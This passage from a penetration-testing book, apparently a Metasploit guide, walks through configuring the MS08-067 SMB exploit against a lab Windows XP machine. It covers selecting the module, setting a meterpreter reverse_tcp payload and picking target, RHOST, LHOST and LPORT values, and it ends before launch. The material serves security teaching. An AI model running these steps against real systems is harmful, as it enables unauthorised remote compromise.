66
Chapter 5
identified as possibly Windows 2003, but the system is missing key ports that
would be associated with the Server Edition.) We’ll assume that our target is
running the English version of XP.
Let’s walk through the actual exploitation. First the setup:
msf > search ms08_067_netapi
[*] Searching loaded modules for pattern 'ms08_067_netapi'...

Exploits
========

   Name                         Rank   Description
   ----                         ----   -----------
   windows/smb/ms08_067_netapi  great  Microsoft Server Service Relative Path Stack Corruption

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)
   5   Windows 2003 SP0 Universal
   6   Windows 2003 SP1 English (NO NX)
   7   Windows 2003 SP1 English (NX)
   8   Windows 2003 SP2 English (NO NX)
   9   Windows 2003 SP2 English (NX)
   . . . SNIP . . .
   26  Windows XP SP2 Japanese (NX)
   . . . SNIP . . .

msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > show options